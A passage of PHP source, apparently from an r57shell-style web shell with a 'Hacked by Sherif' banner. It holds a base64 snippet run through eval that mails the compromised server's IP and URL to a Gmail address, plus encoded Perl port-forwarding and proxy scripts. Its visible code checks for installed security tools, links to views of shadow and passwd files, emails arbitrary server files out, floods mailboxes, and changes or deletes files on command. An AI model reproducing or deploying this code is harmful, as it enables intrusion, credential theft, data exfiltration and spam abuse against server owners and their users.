1653. dCBcbiR3ZWIkaW5qIjsNCgkkc2FmZW0wZGUgPSBAaW5pX2dldCgnc2FmZV9tb2RlJyk7DQoJCWlmICgkc2FmZW0wZGU9MSkgeyRzZWN1cml0eT0gIlN
1654. BRkVfTU9ERSA9IE9OIjt9DQoJCWVsc2UgeyRzZWN1cml0eT0gIlNBRkVfTU9ERSA9IE9GRiI7fTsNCgkkc2VycGVyPWdldGhvc3RieW5hbWUoJF9TRV
1655. JWRVJbJ1NFUlZFUl9BRERSJ10pOw0KCSRpbmpla3RvciA9IGdldGhvc3RieW5hbWUoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10pOw0KCW1haWwoIm5vd
1656. mFzYXlhbmtAZ21haWwuY29tIiwgIiRib2R5IiwiSGFzaWwgQmFqYWthbiBodHRwOi8vJHdlYiRpbmpcbiRzZWN1cml0eVxuSVAgU2VydmVyID0gJHNl
1657. cnBlclxuIElQIEluamVjdG9yPSAkaW5qZWt0b3IiKTsNCgkkX1NFU1NJT05bJ2JhamFrJ10gPSAwOw0KCX0NCmVsc2UgeyRfU0VTU0lPTlsnYmFqYWs
1658. nXSsrO307DQo="; echo eval(base64_decode($datapipe_pm));
1659. $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1660. CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1661. bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1662. gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1663. NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1664. iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1665. aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1666. SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1667. xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1668. WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1669. CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1670. yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1671. I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1672. m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1673. IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1674. lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1675. QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1676. CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1677. c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1678. NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1679. UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1680. DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1681. ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1682. 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1683. $prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
1684. luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
1685. 0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
1686. UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
1687. DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
1688. AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
1689. GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
1690. cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
1691. BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
1692. AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
1693. TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
1694. eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
1695. oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
1696. VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
1697. CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
1698. b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
1699. 0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
1700. 9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
1701. CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
1702. aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
1703. gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
1704. 9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
1705. if($unix)
1706.  {
1707.  if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
1708.  if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
1709.  if($safe_mode) { $sysctl = '-'; }
1710.  else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
1711.  else  
1712.   {
1713.    $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
1714.    if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
1715.    if(empty($sysctl)) { $sysctl = '-'; }
1716.    setcookie('sysctl',$sysctl);
1717.   }  
1718.  }
1719. echo $head;
1720. echo '</head>';
1721.  
1722. echo '<body bgcolor="#000000" TEXT="#ff6600" ><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#000000 width=80><font face=Verdana size=2>'.ws(2).'<font face=Wingdings size=6><b>N</b></font><b>'.ws(2).''.$version.'</b></font></td><td bgcolor=#000000><font face=Verdana size=-2>';
1723. echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
1724. if(isset($_SERVER['X_FORWARDED_FOR'])){echo " X_FORWARDED_FOR: [<font color=red>".$_SERVER['X_FORWARDED_FOR']."</font>]";}
1725. if(isset($_SERVER['CLIENT_IP'])){echo " CLIENT_IP: [<font color=red>".$_SERVER['CLIENT_IP']."</font>]";}
1726. echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]";
1727.  
1728. echo "<br>";
1729.  
1730. echo ws(2)."PHP version: <b>".@phpversion()."</b>";
1731. $curl_on = @function_exists('curl_version');
1732. echo ws(2);
1733. echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
1734. echo "</b>".ws(2);
1735. echo "MySQL: <b>";
1736. $mysql_on = @function_exists('mysql_connect');
1737. if($mysql_on){
1738. echo "<font color=red>ON</font>"; } else { echo "<font color=green>OFF</font>"; }
1739. echo "</b>".ws(2);
1740. echo "MSSQL: <b>";
1741. $mssql_on = @function_exists('mssql_connect');
1742. if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
1743. echo "</b>".ws(2);
1744. echo "PostgreSQL: <b>";
1745. $pg_on = @function_exists('pg_connect');
1746. if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
1747. echo "</b>".ws(2);
1748. echo "Oracle: <b>";
1749. $ora_on = @function_exists('ocilogon');
1750. if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
1751. echo "</b><br>".ws(2);
1752.  
1753. echo "SAFE_MODE: <b>";
1754. echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
1755. echo "</b>".ws(2);
1756. echo "OPEN_BASEDIR: <b>";
1757. if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=green>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};}
1758. else {echo "<font color=green>NONE</font></b>";}
1759. echo ws(2)."SAFE_MODE_EXEC_DIR: <b>";
1760. if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=green>NONE</font></b>";}else {echo "<font color=red>$df</font></b>";};}
1761. else {echo "<font color=red>ini_get disable!</font></b>";}
1762. echo ws(2)."SAFE_MODE_INCLUDE_DIR: <b>";
1763. if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=green>NONE</font></b>";}else {echo "<font color=red>$df</font></b>";};}
1764. else {echo "<font color=red>ini_get disable!</font></b>";}
1765. echo "<br>".ws(2);
1766. echo "DISABLE_FUNCTION : <b>";$df='ini_get  disable!';
1767. if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
1768.  
1769. $free = @diskfreespace($dir);
1770. if (!$free) {$free = 0;}
1771. $all = @disk_total_space($dir);
1772. if (!$all) {$all = 0;}
1773. echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
1774.  
1775. $ust='';
1776. if($unix && !$safe_mode){
1777. if (which('gcc')) {$ust.="gcc,";}
1778. if (which('cc')) {$ust.="cc,";}
1779. if (which('ld')) {$ust.="ld,";}
1780. if (which('php')) {$ust.="php,";}
1781. if (which('perl')) {$ust.="perl,";}
1782. if (which('python')) {$ust.="python,";}
1783. if (which('ruby')) {$ust.="ruby,";}
1784. if (which('make')) {$ust.="make,";}
1785. if (which('tar')) {$ust.="tar,";}
1786. if (which('nc')) {$ust.="netcat,";}
1787. if (which('locate')) {$ust.="locate,";}
1788. if (which('suidperl')) {$ust.="suidperl,";}
1789. }
1790. if (@function_exists('pcntl_exec')) {$ust.="pcntl_exec,";}
1791. #if (which('')) {$ust.=",";}
1792. if($ust){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust."</font>";}
1793.  
1794. $ust='';
1795. if($unix && !$safe_mode){
1796. if (which('kav')) {$ust.="kav,";}
1797. if (which('nod32')) {$ust.="nod32,";}
1798. if (which('bdcored')) {$ust.="bitdefender,";}
1799. if (which('uvscan')) {$ust.="mcafee,";}
1800. if (which('sav')) {$ust.="symantec,";}
1801. #if (which('')) {$ust.=",";}
1802. if (which('drwebd')) {$ust="drwebd,";}
1803. if (which('clamd')) {$ust.="clamd,";}
1804. if (which('rkhunter')) {$ust.="rkhunter,";}
1805. if (which('chkrootkit')) {$ust.="chkrootkit,";}
1806. if (which('iptables')) {$ust.="iptables,";}
1807. if (which('ipfw')) {$ust.="ipfw,";}
1808. if (which('tripwire')) {$ust.="tripwire,";}
1809. if (which('shieldcc')) {$ust.="stackshield,";}
1810. if (which('portsentry')) {$ust.="portsentry,";}
1811. if (which('snort')) {$ust.="snort,";}
1812. if (which('ossec')) {$ust.="ossec,";}
1813. if (which('lidsadm')) {$ust.="lidsadm,";}
1814. if (which('tcplodg')) {$ust.="tcplodg,";}
1815. if (which('tripwire')) {$ust.="tripwire,";}
1816. if (which('sxid')) {$ust.="sxid,";}
1817. if (which('logcheck')) {$ust.="logcheck,";}
1818. if (which('logwatch')) {$ust.="logwatch,";}
1819. #if (which('')) {$ust.=",";}
1820. }
1821. if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust.="mod_security,";}
1822. if($ust){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>$ust</font>";}
1823.  
1824.  
1825. echo "<br>".ws(2)."</b>";
1826. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1827. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1828. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1829. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1830. if(!$unix) {
1831.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?systeminfo title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
1832. }else{
1833.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?syslog title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
1834.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?resolv title=\"View resolv\"><b>resolv</b></a> ".$rb;
1835.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?hosts title=\"View hosts\"><b>hosts</b></a> ".$rb;
1836.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?shadow title=\"View shadow\"><b>shadow</b></a> ".$rb;
1837.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?passwd title=\"".$lang[$language.'_text95']."\"><b>passwd</b></a> ".$rb;
1838. }
1839. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1840. echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb;
1841.  
1842. if($unix && !$safe_mode)
1843. {
1844.  echo "<br>".ws(2)."</b>";
1845.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?procinfo title=\"View procinfo\"><b>procinfo</b></a> ".$rb;
1846.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?version title=\"View proc version\"><b>version</b></a> ".$rb;
1847.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?free title=\"View mem free\"><b>free</b></a> ".$rb;
1848.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?dmesg(8) title=\"View dmesg\"><b>dmesg</b></a> ".$rb;
1849.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?vmstat title=\"View vmstat\"><b>vmstat</b></a> ".$rb;
1850.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lspci title=\"View lspci\"><b>lspci</b></a> ".$rb;
1851.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsdev title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
1852.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?interrupts title=\"View interrupts\"><b>interrupts</b></a> ".$rb;
1853.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise1 title=\"View realise1\"><b>realise1</b></a> ".$rb;
1854.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?realise2 title=\"View realise2\"><b>realise2</b></a> ".$rb;
1855.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?lsattr title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
1856.  
1857.  echo "<br>".ws(2)."</b>";
1858.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?w title=\"View w\"><b>w</b></a> ".$rb;
1859.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?who title=\"View who\"><b>who</b></a> ".$rb;
1860.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?uptime title=\"View uptime\"><b>uptime</b></a> ".$rb;
1861.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?last title=\"View last -n 10\"><b>last</b></a> ".$rb;
1862.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?psaux title=\"View ps -aux\"><b>ps aux</b></a> ".$rb;
1863.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?service title=\"View service\"><b>service</b></a> ".$rb;
1864.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ifconfig title=\"View ifconfig\"><b>ifconfig</b></a> ".$rb;
1865.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?netstat title=\"View netstat -a\"><b>netstat</b></a> ".$rb;
1866.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fstab title=\"View fstab\"><b>fstab</b></a> ".$rb;
1867.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?fdisk title=\"View fdisk -l\"><b>fdisk</b></a> ".$rb;
1868.  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?df title=\"View df -h\"><b>df -h</b></a> ".$rb;
1869. }
1870.  
1871. echo '</font></td></tr><table>
1872.  
1873. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1874. <tr><td align=right width=80>';
1875. echo $font;
1876.  
1877. if($unix){
1878. echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1879. echo "</td><td>";
1880. echo "<font face=Verdana size=-2 color=red><b>";
1881. echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
1882. echo ws(3).$sysctl."<br>";
1883. echo ws(3).ex('echo $OSTYPE')."<br>";
1884. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1885. if(!empty($id)) { echo ws(3).$id."<br>"; }
1886. else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid'))
1887.  {
1888.  $euserinfo  = @posix_getpwuid(@posix_geteuid());
1889.  $egroupinfo = @posix_getgrgid(@posix_getegid());
1890.  echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
1891.  }
1892. else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
1893. echo ws(3).$dir;
1894. echo ws(3).'( '.perms(@fileperms($dir)).' )';
1895. echo "</b></font>";
1896. }
1897. else
1898. {
1899. echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1900. echo "</td><td>";
1901. echo "<font face=Verdana size=-2 color=red><b>";
1902. echo ws(3).@substr(@php_uname(),0,120)."<br>";
1903. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1904. echo ws(3).@getenv("USERNAME")."<br>";
1905. echo ws(3).$dir;
1906. echo "<br></font>";
1907. }
1908. echo "</font>";
1909. echo "</td></tr></table>";
1910.  
1911. // --------------------------------------------------[ c0li.m0de.0n ]
1912. echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1913. <tr><td><font face=Verdana size=4><div align=center><b>";
1914. echo "<marquee>";
1915. echo "<font color=red>Hacked <font color=yellow>by <font color=#00FF00>Sherif<font color=blue> ";
1916. echo "</marquee></font></font></font></font></font></font>";
1917. echo "</div></b></table>";
1918.  
1919. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
1920.  {
1921.  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
1922.  err(6+$res);
1923.  $_POST['cmd']="";  
1924.  }
1925. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
1926.  {  
1927.   if($file=@fopen($_POST['loc_file'],"r")){ $filedump = @fread($file,@filesize($_POST['loc_file'])); @fclose($file); }
1928.   else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
1929.   if(isset($_POST['cmd']))
1930.   {
1931.     $filename = @basename($_POST['loc_file']);
1932.     $content_encoding=$mime_type='';
1933.     compress($filename,$filedump,$_POST['compress']);
1934.     $attach = array(
1935.                     "name"=>$filename,
1936.                     "type"=>$mime_type,
1937.                     "content"=>$filedump
1938.                    );
1939.     if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
1940.     if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
1941.     $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1942.     err(6+$res);
1943.     $_POST['cmd']="";                  
1944.   }
1945.  }
1946. if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size']))
1947.  {
1948.  for($h=1;$h<=$_POST['mail_flood'];$h++){
1949.   $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
1950.  }
1951.  err(6+$res);
1952.  $_POST['cmd']="";  
1953.  }
1954. if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1955. {
1956. $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1957. }
1958. if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1959.  {
1960.  switch($_POST['what'])
1961.    {
1962.    case 'own':
1963.    @chown($_POST['param1'],$_POST['param2']);
1964.    break;
1965.    case 'grp':
1966.    @chgrp($_POST['param1'],$_POST['param2']);
1967.    break;
1968.    case 'mod':
1969.    @chmod($_POST['param1'],intval($_POST['param2'], 8));
1970.    break;
1971.    }
1972.  $_POST['cmd']="";
1973.  }
1974. if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1975.  {
1976.    switch($_POST['what'])
1977.    {
1978.      case 'file':
1979.       if($_POST['action'] == "create")
1980.        {
1981.        if(@file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
1982.        else {
1983.         @fclose($file);
1984.         $_POST['e_name'] = $_POST['mk_name'];
1985.         $_POST['cmd']="edit_file";
1986.         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1987.         }
1988.        }
1989.        else if($_POST['action'] == "delete")
1990.        {
1991.        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1992.        $_POST['cmd']="";
1993.        }
1994.      break;
1995.      case 'dir':
1996.       if($_POST['action'] == "create"){
1997.       if(@mkdir($_POST['mk_name']))
1998.        {
1999.          $_POST['cmd']="";
2000.          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
2001.        }
2002.       else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
2003.       }
2004.       else if($_POST['action'] == "delete"){
